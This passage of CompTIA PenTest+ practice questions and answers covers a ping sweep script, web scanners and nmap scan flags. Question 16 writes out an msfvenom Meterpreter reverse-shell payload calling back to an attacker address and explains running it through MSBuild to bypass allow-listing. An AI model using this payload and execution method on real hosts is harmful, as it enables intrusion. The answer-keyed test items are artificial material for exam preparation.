B. Add 2>&1 at the end of line 3.

C. Use seq on the loop on line 2.

D. Replace $h with ${h} on line 3.

Answer: C

Explanation:

The provided Bash script pings each address in a /24 once, with a 1-second timeout, and reports a host as up when ping exits with status 0.

Analysis:

Line 2: The loop uses the brace expansion {1..254} to iterate over the host numbers. Brace expansion is a bash feature, not part of POSIX sh; if the script is run with sh (dash on Debian and Ubuntu) or pasted into a restricted shell, the loop body executes once with the literal string "{1..254}" and every host is reported down.

Lines 3 and 4 are fine as written: redirecting stdout to /dev/null does not affect the exit status, and $? on line 4 is ping's exit status. Adding 2>&1 (option B) only silences error messages; changing the condition (option A) or bracing $h (option D) changes nothing, since $h is already unambiguous in that position.

Using seq for Better Compatibility:

The seq command emits the numbers as separate words, which works in any POSIX shell on a system that has seq (GNU coreutils and the BSD base systems):

for h in $(seq 1 254); do

This change ensures broader compatibility and reliability of the script. (Two unrelated improvements a tester would normally also make: run the pings in parallel, since 254 sequential 1-second timeouts take minutes, and print the full address rather than only the host number.)

Modified Script:

1 network_addr="192.168.1"
2 for h in $(seq 1 254); do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo "Host $h is up"
6 else
7 echo "Host $h is down"
8 fi
9 done
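The same sweep in Python, added as an example (not from the original post) to show two improvements a tester would make to the script: running the pings in parallel, and separating the probe from the loop so the logic can be tested without a network. ping_host() assumes a ping that accepts -c and -W as on Linux; the fake probe in the usage block is constructed.

```python
"""Host sweep with the same logic as the Bash script in question 13, run
concurrently and with the probe separated from the loop.

Added example, not part of the original post. ping_host() assumes a
Linux-style ping that accepts -c (count) and -W (timeout in seconds);
the fake probe under __main__ is constructed so the script runs offline.
"""
import subprocess
from concurrent.futures import ThreadPoolExecutor


def ping_host(ip):
    """One ICMP echo with a 1 s timeout; exit status 0 means a reply came back."""
    return subprocess.run(["ping", "-c", "1", "-W", "1", ip],
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL).returncode == 0


def hosts(network_addr, first=1, last=254):
    """Expand a /24 prefix the way the script's seq loop does."""
    return [f"{network_addr}.{h}" for h in range(first, last + 1)]


def sweep(network_addr, probe=ping_host, workers=64):
    """Return (up, down) lists of full addresses. 254 sequential 1 s
    timeouts take minutes; 64 workers bring the worst case to seconds."""
    targets = hosts(network_addr)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(probe, targets))
    up = [ip for ip, ok in zip(targets, results) if ok]
    down = [ip for ip, ok in zip(targets, results) if not ok]
    return up, down


if __name__ == "__main__":
    # Constructed probe: pretends .1, .10 and .254 answer, so the output is
    # reproducible; pass probe=ping_host (the default) on a real network.
    fake = lambda ip: ip.rsplit(".", 1)[1] in {"1", "10", "254"}
    up, down = sweep("192.168.1", probe=fake)
    print(f"{len(up)} up, {len(down)} down: {up}")
```

Keep in mind that a ping sweep only finds hosts that answer ICMP; hosts behind a host firewall that drops echo requests show up as down, and on an internal assessment an ARP scan of the local segment (or nmap -sn, which also tries TCP probes) is more reliable.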

14. A penetration tester is attempting to discover vulnerabilities in a company's web application.

Which of the following tools would most likely assist with testing the security of the web application?

A. OpenVAS

B. Nessus

C. sqlmap

D. Nikto

Answer: D

Explanation:

When testing the security of a web application, specific tools are designed to uncover vulnerabilities and issues. Here’s an overview of the tools mentioned and why Nikto is the most suitable for this task:

Nikto:

Purpose: Nikto is a web server scanner that checks a site for thousands of known dangerous files and CGIs, outdated server software, and misconfigurations such as missing security headers or exposed administrative paths.

Relevance: It is built specifically for web targets, making it the most appropriate choice among the four for a penetration tester starting on a web application. Note that Nikto is loud (it sends every check, with no evasion by default) and finds server-level issues rather than application logic flaws, so it is the first pass rather than the whole test; an interception proxy such as Burp Suite or OWASP ZAP covers what it does not.

Comparison with Other Tools:

OpenVAS: A general-purpose vulnerability scanner that targets a wide range of network services and hosts; it includes some web checks but is not tailored to web applications.

Nessus: Similar to OpenVAS, a comprehensive network vulnerability scanner that is broader in scope and not focused on web applications.

sqlmap: Excellent for finding and exploiting SQL injection, but limited to that one vulnerability class and therefore not a tool for discovering what else the application exposes.

15. A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services.

Which of the following commands should the tester use?

A. nmap -sU -sW -p 1-65535 example.com

B. nmap -sU -sY -p 1-65535 example.com

C. nmap -sU -sT -p 1-65535 example.com

D. nmap -sU -sN -p 1-65535 example.com

Answer: C

Explanation:

To find the state of both TCP and UDP ports using Nmap, the command should combine a TCP scan type with the UDP scan type:

Understanding the Options:

-sU: Performs a UDP scan.

-sT: Performs a TCP connect scan, which completes the three-way handshake and does not require raw-socket privileges.

Command Explanation:

Command: nmap -sU -sT -p 1-65535 example.com

This command scans both TCP and UDP ports from 1 to 65535 on example.com; -p applies to both protocols. Combining -sU and -sT ensures that both kinds of service are covered. With root privileges -sS (SYN scan) is the usual TCP choice and pairs with -sU in the same way. Expect the UDP half to be slow: closed UDP ports are inferred from ICMP port-unreachable messages that most hosts rate-limit, so a full 65535-port UDP sweep can take hours, and open|filtered results need version probing (-sV) to resolve.

Comparison with Other Options:

-sW: Initiates a TCP Window scan, an ACK-style scan that relies on a quirk of some TCP stacks; it is not a reliable way to establish port state.

-sY: Initiates a SCTP INIT scan, a different transport protocol and not relevant here.

-sN: Initiates a TCP Null scan, which sends packets with no flags set; it is a firewall-evasion technique that does not work against Windows targets and does not cover UDP.

16. A tester plans to perform an attack technique over a compromised host.

The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.

Which of the following commands would most likely be used by the tester to continue with the attack on the host?

A. regsvr32 /s /n /u C:\evil.xml

B. MSBuild.exe C:\evil.xml

C. mshta.exe C:\evil.xml

D. AppInstaller.exe C:\evil.xml

Answer: B

Explanation:

The provided msfvenom command emits the shellcode as a C# byte array (-f csharp). That format is chosen because the delivery vehicle is an MSBuild project file: evil.xml is a project containing an inline C# task that embeds the array and injects it into memory, and MSBuild compiles and runs that task when it processes the file.

Understanding MSBuild.exe:

Purpose: MSBuild is the .NET build engine. It processes project files written in XML, and a project can declare an inline task (UsingTask with a CodeTaskFactory) whose C# source is compiled and executed during the build. Because MSBuild.exe is a signed Microsoft binary installed with the .NET Framework (under %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\ on 64-bit hosts), it is a classic allow-list bypass, catalogued by MITRE ATT&CK as T1127.001 (Trusted Developer Utilities Proxy Execution: MSBuild).

Command Usage:

Command: MSBuild.exe C:\evil.xml

This command tells MSBuild to process evil.xml. The inline task is compiled and run inside the MSBuild process, which executes the shellcode and calls back to 10.12.12.1:10112 with the Meterpreter stager.

Comparison with Other Commands:

regsvr32 /s /n /u C:\evil.xml: regsvr32 registers and unregisters COM DLLs (its classic abuse, "squiblydoo", uses /i: with a scriptlet URL and scrobj.dll); it does not process C# or MSBuild XML.

mshta.exe C:\evil.xml: Executes HTML applications (HTA) containing VBScript or JScript, not an XML project with C# code.

AppInstaller.exe C:\evil.xml: Installs MSIX/AppX packages and is not relevant for executing C# code embedded in an XML file.

Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file built from the msfvenom output. Detection-wise, MSBuild.exe launched from a user profile or with a project file outside a build directory, followed by an outbound connection from that process, is the pattern defenders look for; WDAC and AppLocker policies that follow Microsoft's recommended block rules deny MSBuild.exe for exactly this reason, so on a hardened host this option may be blocked as well.

Visit full PT0-003 study material or practice exam to get access to a complete set of practice questions, study guides, and other tools to ensure you’re fully prepared to pass the CompTIA PenTest+ exam on your first attempt!
